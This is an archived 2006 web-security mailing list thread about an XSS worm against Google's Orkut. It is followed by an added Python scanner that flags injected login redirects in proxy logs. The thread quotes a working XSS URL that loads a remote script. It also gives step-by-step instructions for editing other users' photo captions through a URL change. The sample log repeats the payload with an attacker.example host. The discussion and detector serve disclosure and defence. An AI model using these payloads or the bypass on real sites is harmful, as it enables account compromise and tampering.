RES: [WEB SECURITY] XSS worm attacking Google?
Denny Roger
denny at batori.com.br
Sun Dec 10 05:14:35 EST 2006
Brazilian application security specialists discovered some vulnerabilities
in Orkut. In Brazil, Orkut is very popular.
The vulnerability allows modifying the captions of Orkut photos.
(http://idgnow.uol.com.br/seguranca/2006/01/17/idgnoticia.2006-02-06.6899894936/IDGNoticia_view)
Users can modify the credits in the photo albums of any member of Google's
virtual community.
1 - Log in to Orkut and visit the victim's photo album. Choose the photo
whose caption you want to edit and click to view the full photo.
2 - Look at the page address in the address bar (the place where you type
the address of the site you want to visit). In this example, the address of
the full photo in the album is:
http://www.orkut.com/AlbumZoom.aspx?uid=9803017927649916035&pid=10
3 - Change the word AlbumZoom to AlbumEdit.
http://www.orkut.com/AlbumEdit.aspx?uid=9803017927649916035&pid=10
Press ENTER and done! You are on the photo's edit page.
Other news:
Worm arrives on the PC disguised as an Orkut scrap message
(http://idgnow.uol.com.br/seguranca/2006/05/30/idgnoticia.2006-05-30.5912736251/IDGNoticia_view)
Profiles on the service were the targets of fake messages that directed the
user to an .exe file that, once installed, stole the user's personal data.
These are some examples. There are many cases registered in Brazil.
All the discovered vulnerabilities have been corrected.
Regards,
Denny Roger
Batori Software & Security
www.batori.com.br
+55 (11) 5084.0071
Founded in 1997, Batori Software & Security is recognized as a company
highly specialized in Information Security.
The good security practices implemented in the projects developed by
Batori Software & Security allowed the creation of the proprietary BSM
methodology, in compliance with ISO 17799 and ISO 15408.
Our team develops, maintains, and makes available free of charge a
collection of research documents on various aspects of Information Security.
_____
From: Kuai Hinojosa [mailto:kuai.hinojosa at gmail.com]
Sent: Sunday, December 10, 2006 02:04
To: pdp (architect)
Cc: Billy Hoffman; Web Security
Subject: Re: [WEB SECURITY] XSS worm attacking Google?
That is not Spanish, that is Portuguese. Thanks for sharing this information,
Billy.
On 12/9/06, pdp (architect) <pdp.gnucitizen at googlemail.com> wrote:
Nice find. It seems that it is written by someone who speaks Spanish.
There was a discussion on sla.ckers.org about a vulnerability in orkut
I think... or was that somewhere else. Anyway, it is funny that
attackers came with this worm so quickly since that is only a two-week-old
finding. It seems that bad guys are starting to realise the power of XSS
worms and their destructive potential. This is not good news!
On 12/9/06, Billy Hoffman <Billy.Hoffman at spidynamics.com> wrote:
> Folks,
>
> I was running through some proxy logs, and saw a reference to
> http://sb.google.com/safebrowsing/update
>
> Requesting redirected me to a blacklist of what look like phishing
> sites. However, all the way at the bottom was a reference to Google's
> Orkut site. Specifically the blacklist entry was for a GET-based XSS
> attack against Google's GLogin system.
>
> https://www.orkut.com/GLogin.aspx?done=http://www.orkut.com/Scrapbook.aspx?na=\";};//--></script><script%20src=\'http://www.probranco.net/xmen.js\'></script><!--
>
> If you request that URL, you get a 403 error page saying your query is
> from an automated attack. Looks very similar to a page Google returned
> during the Perl.Santy attack a year or so back.
>
> The JavaScript source code to the attack is still available at
> http://www.probranco.net/xmen.js
>
> Enjoy,
> Billy Hoffman
> --
> Lead Researcher, SPI Labs
> SPI Dynamics Inc. - http://www.spidynamics.com
> Phone: 678-781-4800
> Direct: 678-781-4845
--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
----------------------------------------------------------------------------
The Web Security Mailing List:
http://www.webappsec.org/lists/websecurity/
The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
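As an added example (not code from this thread, from Google or from Orkut), the following Python scanner runs over constructed proxy-log lines and flags GLogin.aspx requests whose done redirect parameter decodes to HTML or script markup, the signature Billy describes seeing in the Safe Browsing blacklist. The log format, the client addresses and the attacker.example host are assumptions.

```python
import re
from urllib.parse import urlsplit, unquote

# Tag opener/closer or HTML comment delimiters: none of these belong in a
# redirect target, so their presence after decoding marks the request.
MARKUP_RE = re.compile(r"<\s*/?\s*script|</|<!--|-->", re.IGNORECASE)


def query_values(url: str, param: str) -> list:
    """Return raw values of *param*; split on '&' only, so ';' in payloads survives."""
    values = []
    for pair in urlsplit(url).query.split("&"):
        name, _, value = pair.partition("=")
        if name == param:
            values.append(value)
    return values


def redirect_param_is_tainted(url: str, param: str = "done") -> bool:
    """True when the redirect parameter decodes (even if double-encoded) to markup."""
    for value in query_values(url, param):
        decoded = value
        for _ in range(3):  # peel repeated percent-encoding
            nxt = unquote(decoded)
            if nxt == decoded:
                break
            decoded = nxt
        if MARKUP_RE.search(decoded):
            return True
    return False


def scan_log(lines) -> list:
    """Return (client_ip, url) for each GLogin request carrying a tainted redirect."""
    hits = []
    for line in lines:
        fields = line.split()  # assumed format: ts client method url status
        if len(fields) < 5:
            continue
        _ts, client, _method, url, _status = fields[:5]
        if "GLogin.aspx" in url and redirect_param_is_tainted(url):
            hits.append((client, url))
    return hits


# Constructed sample log: one benign login redirect, one injected one, one album view.
SAMPLE_LOG = [
    "1165720001 10.0.0.5 GET https://www.orkut.com/GLogin.aspx?done=http://www.orkut.com/Scrapbook.aspx 302",
    r'''1165720002 10.0.0.9 GET https://www.orkut.com/GLogin.aspx?done=http://www.orkut.com/Scrapbook.aspx?na=\";};//--></script><script%20src=\'http://attacker.example/xmen.js\'></script><!-- 403''',
    "1165720003 10.0.0.5 GET https://www.orkut.com/AlbumZoom.aspx?uid=1&pid=10 200",
]
```

The same check applies server-side: a login endpoint should reject or canonicalise any done value that is not a same-origin path before echoing it into the page.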